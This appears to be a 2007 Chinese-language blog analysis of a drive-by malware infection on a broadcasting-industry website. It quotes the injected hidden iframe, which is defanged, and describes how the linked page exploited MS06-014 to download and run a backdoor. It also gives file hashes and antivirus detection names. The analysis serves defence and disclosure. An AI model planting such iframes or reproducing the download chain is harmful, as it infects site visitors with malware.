某廣電行業網站被掛馬 Backdoor.Win32.Gpigeon.aic/ sx.exe
endurer 原創
2007-09-06 第1版
網站頁面被植入代碼:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript指令碼,首先輸出escape編碼的資訊:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接著利用 MS06014 漏洞,下載 sx.exe,儲存為 %system32%/Cuteqq_Cn.exe,再用 shell.execute來運行。
檔案說明符 : d:/test/sx.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-9-5 12:46:20
修改時間 : 2007-9-5 12:46:56
訪問時間 : 2007-9-5 0:0:0
大小 : 284672 位元組 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒體檔案的表徵圖
Kasepersky 報為 Packed.Win32.Klone.af
| 主 題: | 病毒上報郵件分析結果-流水單號:20070905125954073811 | |
| 寄件者: | "" <send@rising.net.cn> | 發送時間2007.09.05 14:16 |
尊敬的客戶,您好!
您的郵件已經收到,感謝您對瑞星的支援。
我們已經詳細分析過您的問題和檔案,以下是您上傳的檔案的分析結果:
1.檔案名稱:sx.exe
病毒名:Backdoor.Win32.Gpigeon.aic
您所上報的病毒檔案將在19.39.30版本中處理解決。
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
